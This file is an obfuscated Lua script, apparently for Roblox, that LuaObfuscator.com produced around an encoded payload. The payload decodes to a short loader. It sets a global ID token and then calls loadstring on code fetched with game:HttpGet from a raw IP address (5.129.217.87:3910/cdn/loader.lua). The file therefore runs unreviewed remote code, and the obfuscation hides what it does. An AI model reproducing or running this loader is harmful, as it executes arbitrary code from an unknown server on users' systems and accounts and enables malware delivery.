--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v90=v2(v0(v30,16));if v19 then local v113=v5(v90,v19);v19=nil;return v113;else return v90;end end end);local function v20(v31,v32,v33) if v33 then local v91=877 -(282 + 595) ;local v92;while true do if (v91==(0 -0)) then v92=(v31/(2^(v32-1)))%((5 -(1640 -(1523 + 114)))^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v92-(v92%(932 -(771 + 86 + (105 -31)))) ;end end else local v93=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v93 + v93))>=v93) and (1 + 0)) or (0 + 0) ;end end local function v21() local v34=1065 -(68 + 997) ;local v35;while true do if (v34==1) then return v35;end if (v34==(1270 -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=(116 + 2) -(32 + 85) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -(892 + 65)) ;return (v37 * (610 -354)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (5 -2) );v18=v18 + 3 + 1 ;return (v41 * (30800116 -14022900)) + (v40 * (65886 -(87 + 263))) + (v39 * ((1070 -634) -(50 + 17 + 113))) + v38 ;end local function v24() local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(955 -(802 + 48 + 102))) then if (v47==(0 -0)) then if (v46==(0 -0)) then return v48 * (0 + 0) ;else local v118=997 -(750 + 165 + 82) ;while true do if (v118==(0 -0)) then v47=(773 -(201 + 571)) + 0 ;v45=0 -(1138 -(116 + 1022)) ;break;end end end elseif (v47==(3234 -(1069 + 118))) then return ((v46==(0 -0)) and (v48 * ((1 -0)/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(4258 -3235) ) * (v45 + (v46/((3 -1)^(52 + 0)))) ;end if (v42==(791 -(368 + 423))) then v43=v23();v44=v23();v42=1;end if (v42==(6 -(3 + 1))) then v47=v20(v44,39 -(10 + 8) ,119 -88 );v48=((v20(v44,(1730 -1256) -(416 + 26) )==(3 -2)) and  -1) or (1 + (0 -0)) ;v42=(863 -(814 + 45)) -(2 -1) ;end if (v42==1) then v45=1;v46=(v20(v44,439 -(145 + 293) ,450 -(3 + 41 + 386) ) * ((1488 -(998 + 488))^32)) + v43 ;v42=1 + 1 ;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(885 -(261 + 624))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 -0) );v18=v18 + v49 ;local v51={};for v67=1081 -(1020 + 60) , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v94,v95,v96,v97,v98,v99,v100,v101,v102) local v103=(function() return 0;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do local v112=(function() return 1637 -(195 + 1442) ;end)();while true do if ((0 -0)~=v112) then else if (v103~=1) then else while true do if (v94~=(0 + 0)) then else v95=(function() return v96();end)();if (v97(v95, #"~", #"[")~=0) then else local v167=(function() return 0;end)();local v168=(function() return;end)();local v169=(function() return;end)();local v170=(function() return;end)();local v171=(function() return;end)();while true do if ((1 + 0)==v167) then local v182=(function() return 0;end)();local v183=(function() return;end)();while true do if (v182~=(396 -(115 + 281))) then else v183=(function() return 0 -0 ;end)();while true do if (0==v183) then v170=(function() return nil;end)();v171=(function() return nil;end)();v183=(function() return 1;end)();end if (v183~=(1 + 0)) then else v167=(function() return 4 -2 ;end)();break;end end break;end end end if (v167==(0 -0)) then v168=(function() return 867 -(550 + 317) ;end)();v169=(function() return nil;end)();v167=(function() return 1 -0 ;end)();end if (2~=v167) then else while true do if (v168==(2 -0)) then local v184=(function() return 0;end)();local v185=(function() return;end)();while true do if (v184~=(0 -0)) then else v185=(function() return 285 -(134 + 151) ;end)();while true do if (v185==(1665 -(970 + 695))) then if (v97(v170, #",", #"[")~= #"{") then else v171[2]=(function() return v98[v171[2]];end)();end if (v97(v170,2,2)~= #"<") then else v171[ #"xnx"]=(function() return v98[v171[ #"-19"]];end)();end v185=(function() return 1;end)();end if (v185~=(1 -0)) then else v168=(function() return  #"19(";end)();break;end end break;end end end if (v168==0) then local v186=(function() return 1990 -(582 + 1408) ;end)();local v187=(function() return;end)();while true do if (v186==0) then v187=(function() return 0;end)();while true do if (v187==1) then v168=(function() return  #",";end)();break;end if (v187~=(0 -0)) then else v169=(function() return v97(v95,2, #"19(");end)();v170=(function() return v97(v95, #"0313",7 -1 );end)();v187=(function() return 3 -2 ;end)();end end break;end end end if (v168== #"xnx") then if (v97(v170, #"19(", #"19(")~= #",") then else v171[ #"xnxx"]=(function() return v98[v171[ #"http"]];end)();end v99[v100]=(function() return v171;end)();break;end if (v168== #"}") then local v189=(function() return 1824 -(1195 + 629) ;end)();local v190=(function() return;end)();while true do if (v189==(0 -0)) then v190=(function() return 0;end)();while true do if (v190==(242 -(187 + 54))) then v168=(function() return 2;end)();break;end if ((780 -(162 + 618))==v190) then v171=(function() return {v101(),v101(),nil,nil};end)();if (v169==0) then local v194=(function() return 0;end)();local v195=(function() return;end)();while true do if (v194==(0 + 0)) then v195=(function() return 0;end)();while true do if (v195==0) then v171[ #"-19"]=(function() return v101();end)();v171[ #".com"]=(function() return v101();end)();break;end end break;end end elseif (v169== #" ") then v171[ #"-19"]=(function() return v102();end)();elseif (v169==(3 -1)) then v171[ #"xxx"]=(function() return v102() -(2^16) ;end)();elseif (v169== #"91(") then local v200=(function() return 0 -0 ;end)();while true do if (v200~=0) then else v171[ #"-19"]=(function() return v102() -((1 + 1)^(1652 -(1373 + 263))) ;end)();v171[ #"asd1"]=(function() return v101();end)();break;end end end v190=(function() return 1;end)();end end break;end end end end break;end end end break;end end return v94,v95,v96,v97,v98,v99,v100,v101,v102;end if ((1000 -(451 + 549))~=v103) then else local v122=(function() return 0 + 0 ;end)();while true do if (v122==0) then v94=(function() return 0;end)();v95=(function() return nil;end)();v122=(function() return 1 -0 ;end)();end if (v122==(1 -0)) then v103=(function() return 1;end)();break;end end end break;end end end end;end)();local v53=(function() return function(v104,v105,v106) local v107=(function() return 0;end)();local v108=(function() return;end)();while true do if (v107==0) then v108=(function() return 0;end)();while true do if (v108~=0) then else v104[v105-#"<" ]=(function() return v106();end)();return v104,v105,v106;end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"/",v58 do local v70=(function() return 0;end)();local v71=(function() return;end)();local v72=(function() return;end)();local v73=(function() return;end)();while true do if (v70==1) then v73=(function() return nil;end)();while true do if (0~=v71) then else local v119=(function() return 0;end)();local v120=(function() return;end)();while true do if (v119~=(1384 -(746 + 638))) then else v120=(function() return 0;end)();while true do if (1==v120) then v71=(function() return 1 + 0 ;end)();break;end if (0~=v120) then else v72=(function() return v21();end)();v73=(function() return nil;end)();v120=(function() return 1 -0 ;end)();end end break;end end end if (v71~=(342 -(218 + 123))) then else if (v72== #"[") then v73=(function() return v21()~=0 ;end)();elseif (v72==(1583 -(1535 + 46))) then v73=(function() return v24();end)();elseif (v72== #"xnx") then v73=(function() return v25();end)();end v59[v69]=(function() return v73;end)();break;end end break;end if (v70~=0) then else v71=(function() return 0 + 0 ;end)();v72=(function() return nil;end)();v70=(function() return 1;end)();end end end v57[ #"-19"]=(function() return v21();end)();for v74= #" ",v23() do FlatIdent_44839,Descriptor,v21,v20,v59,v54,v74,v22,v23=(function() return v52(FlatIdent_44839,Descriptor,v21,v20,v59,v54,v74,v22,v23);end)();end for v75= #"!",v23() do v55,v75,v28=(function() return v53(v55,v75,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1 + 0 + 0 ];local v65=v61[562 -(306 + 254) ];local v66=v61[1 + 2 + 0 ];return function(...) local v76=v64;local v77=v65;local v78=v66;local v79=v27;local v80=1;local v81= -1;local v82={};local v83={...};local v84=v12("#",...) -(1 -(0 -0)) ;local v85={};local v86={};for v109=(3760 -2293) -(899 + 568) ,v84 do if ((2104>=1421) and (v109>=v78)) then v82[v109-v78 ]=v83[v109 + 1 ];else v86[v109]=v83[v109 + 1 + 0 ];end end local v87=(v84-v78) + 1 ;local v88;local v89;while true do v88=v76[v80];v89=v88[2 -1 ];if (v89<=(613 -(268 + 335))) then if (v89<=(294 -(60 + 230))) then if (v89<=(573 -(426 + 146))) then if (v89==((1551 -(1126 + 425)) + 0)) then v63[v88[3]]=v86[v88[1458 -(282 + 1174) ]];else local v126=v88[(1218 -(118 + 287)) -(569 + 242) ];local v127,v128=v79(v86[v126](v13(v86,v126 + (2 -1) ,v88[3])));v81=(v128 + v126) -(1 + 0) ;local v129=1024 -(706 + 318) ;for v144=v126,v81 do local v145=1251 -(721 + 530) ;while true do if ((1271 -(945 + 326))==v145) then v129=v129 + (2 -1) ;v86[v144]=v127[v129];break;end end end end elseif (v89<=(2 + 0)) then v86[v88[702 -((1062 -791) + 429) ]]();elseif (v89==(3 + 0)) then local v148=v88[(2623 -(118 + 1003)) -(1408 + 92) ];local v149=v86[v88[1089 -(461 + 625) ]];v86[v148 + (1289 -(993 + 295)) ]=v149;v86[v148]=v149[v88[1 + 3 ]];else v86[v88[(3432 -2259) -(418 + 753) ]]=v88[(379 -(142 + 235)) + 1 ];end elseif ((1812<=3249) and (v89<=((4 -3) + 6))) then if ((232<821) and (v89<=(2 + 3))) then for v146=v88[1 + 1 ],v88[532 -(406 + 123) ] do v86[v146]=nil;end elseif (v89==(1775 -(1749 + 20))) then v86[v88[1 + 1 ]]=v63[v88[3]];else v80=v88[1325 -(1249 + 16 + 57) ];end elseif (v89<=(3 + 5)) then v86[v88[2]]=v88[1148 -(466 + (1656 -(553 + 424))) ];elseif (v89==(21 -12)) then local v158=v88[5 -3 ];v86[v158]=v86[v158](v13(v86,v158 + (1901 -((199 -93) + 1794)) ,v81));else local v160=0 + 0 ;local v161;while true do if (v160==(0 + 0)) then v161=v88[2 + 0 ];v86[v161]=v86[v161](v13(v86,v161 + (2 -1) ,v81));break;end end end elseif (v89<=(15 + 0)) then if (v89<=(32 -20)) then if ((518<902) and (v89>((73 + 52) -(4 + 110)))) then local v132=584 -(57 + 527) ;local v133;local v134;local v135;local v136;while true do if (v132==((607 + 820) -(41 + 1386))) then v133=v88[105 -(17 + 50 + 36) ];v134,v135=v79(v86[v133](v13(v86,v133 + 1 + 0 ,v88[3])));v132=1 -0 ;end if (v132==(2 -1)) then v81=(v135 + v133) -((361 -194) -(122 + 44)) ;v136=0 -(0 -0) ;v132=6 -4 ;end if ((1623<=1957) and (v132==(2 + 0))) then for v177=v133,v81 do v136=v136 + 1 + 0 ;v86[v177]=v134[v136];end break;end end else v86[v88[3 -1 ]]=v63[v88[68 -(30 + 35) ]];end elseif (v89<=(9 + 4)) then local v139=v88[1259 -((2335 -1292) + 214) ];local v140=v86[v88[3]];v86[v139 + (3 -2) ]=v140;v86[v139]=v140[v88[1216 -(323 + 889) ]];elseif ((2994>858) and (v89>(37 -(7 + 16)))) then for v173=v88[(2812 -2230) -(361 + 219) ],v88[(1076 -(239 + 514)) -(53 + 267) ] do v86[v173]=nil;end else v86[v88[1 + 1 ]]();end elseif ((v89<=18) or (3755<=915)) then if ((4412==4412) and (v89<=(429 -(6 + 9 + 398)))) then if (v86[v88[984 -(18 + 964) ]]==v88[4]) then v80=v80 + 1 ;else v80=v88[3];end elseif (v89>(63 -46)) then v63[v88[2 + 1 ]]=v86[v88[2]];else do return;end end elseif ((1750>=842) and (v89<=(12 + 7))) then if ((4372>1850) and (v86[v88[2]]==v88[854 -(20 + 830) ])) then v80=v80 + 1 + 0 ;else v80=v88[129 -(116 + (1339 -(797 + 532))) ];end elseif ((3946>3743) and (v89==(2 + 14 + 4))) then v80=v88[741 -(542 + 196) ];else do return;end end v80=v80 + (1 -0) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!073Q00028Q0003023Q00494403243Q0065393338652Q32392D382Q62662D346166382D383739322D396430666538346462633831030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403283Q00682Q74703A2Q2F352E3132392E3231372E38373A333931302F63646E2F6C6F616465722E6C75617500153Q0012083Q00014Q000F000100013Q0026133Q0002000100010004073Q00020001001208000100013Q00261300010005000100010004073Q00050001001208000200033Q00122Q000200023Q00120B000200043Q00120B000300053Q00200D000300030006001208000500074Q000C000300054Q000900023Q00022Q000E0002000100010004073Q001400010004073Q000500010004073Q001400010004073Q000200012Q00153Q00017Q00",v9(),...);
